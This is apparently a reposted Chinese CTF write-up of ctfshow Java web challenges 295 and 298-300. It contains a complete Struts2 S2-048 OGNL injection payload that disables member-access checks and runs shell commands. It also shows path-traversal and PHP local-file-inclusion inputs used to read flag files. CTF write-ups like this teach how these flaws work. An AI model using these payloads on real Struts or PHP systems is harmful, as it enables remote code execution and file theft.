当前位置: 首页 > news >正文

ctfshow web入门 java 295 298-300

其他没啥好讲的,都是工具就通杀了

web295

漏洞地址 http://ip/S2-048/integration/saveGangster.action

 

这里我们可以看到他是解析了

 

尝试使用网上的payload

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

这里我们发现,他是解析了Runtime的,然后我们就可以利用它里面的方法执行命令

 

//这里我们无论是env,还是cat /proc/self/environ都有报错
payload:%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('env').getInputStream())).(#q)}

但是报错中的这个就是flag

web298

这里给我们了一个jar,打包好了的包,这里我们使用一些反编译工具查看一下

在loginServlet类中,我们看到这里经过这么判断才能获得flag,跟踪一下看看。

这里看到getVipStatus方法,获得了获取flag的条件就是user等于admin,password等于ctfshow

但是题目一进去就一个报错,看这里软件包里面有ctfshow,尝试一下目录ctfshow

得到提示通过login,传参username和password

 

payload:/ctfshow/login?username=admin&password=ctfshow

web299

查看源代码获得提示,这里可能存在任意文件读取,我们首先查看index.jsp,这里发现存在任意文件读取,这里我们继续读取WEB-INF/web.xml

 

这里我们看到,这里有一个软件包中有一个GetFlag类,这里我们去读取WEB-INF/classes/com/ctfshow/servlet/GetFlag.class去

 虽然很乱,但是在这里发现了flag

payload: /view-source?file=../../../../../../fl3g

web300

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];include($file);
}else{highlight_file(__FILE__);
} 

和上面差不多

payload: ?file=../../../../../f1bg
http://www.lryc.cn/news/55915.html

相关文章:

  • SWIG包装器使用指南——(四)C#使用SWIG简介与实践
  • HashTable, HashMap 和 ConcurrentHashMap
  • ToBeWritten之IoT 技战法
  • 基于ASP.NET开发的医院手术麻醉信息管理系统源码 项目源码
  • 伪加密超具体破解办法,直击原理底层,细致演示!!!
  • ChatGPT大规模封锁亚洲地区账号
  • 脂肪酸脂质Myristic acid PEG NHS,Myristic-acid PEG NHS ester,肉豆蔻酸PEG活性酯,具有优异疏水性
  • MFC - CFormView类学习1
  • 图像预处理方法
  • 【蓝桥杯C/C++】专题六:动态规划
  • 图的定义和基本术语
  • 041:cesium加载Blue Marble地图
  • 【概念梳理】激活函数
  • 【python】@property 和 @staticmethod
  • Spring题集 - Spring AOP相关面试题总结
  • 分考场
  • BI技巧丨DAX Studio
  • Java 8常用时间 API
  • C++运算符
  • 低/无代码赋能企业,IT与业务的角色正在悄然改变
  • SpringCloud学习2(Spring Cloud Netflix)负载均衡Ribbon、Feign负载均衡、Hystix服务熔断
  • Spring 源码解析 - @Async 注解下的循环依赖问题原理
  • 8个全球性编程比赛,天才程序员的梦想舞台
  • 2023年中国海洋大学计算机及电子信息考研分析
  • 【C++笔试强训】第六天
  • Redission 中的 RedLock 原理实现, springboot 你造吗?
  • 【沐风老师】3dMax一键房屋创建者插件使用方法详解
  • C/C++ 变量详解
  • 新SSD盘安装操作系统启动不了
  • 基于Spring、SpringMVC、MyBatis的病历管理系统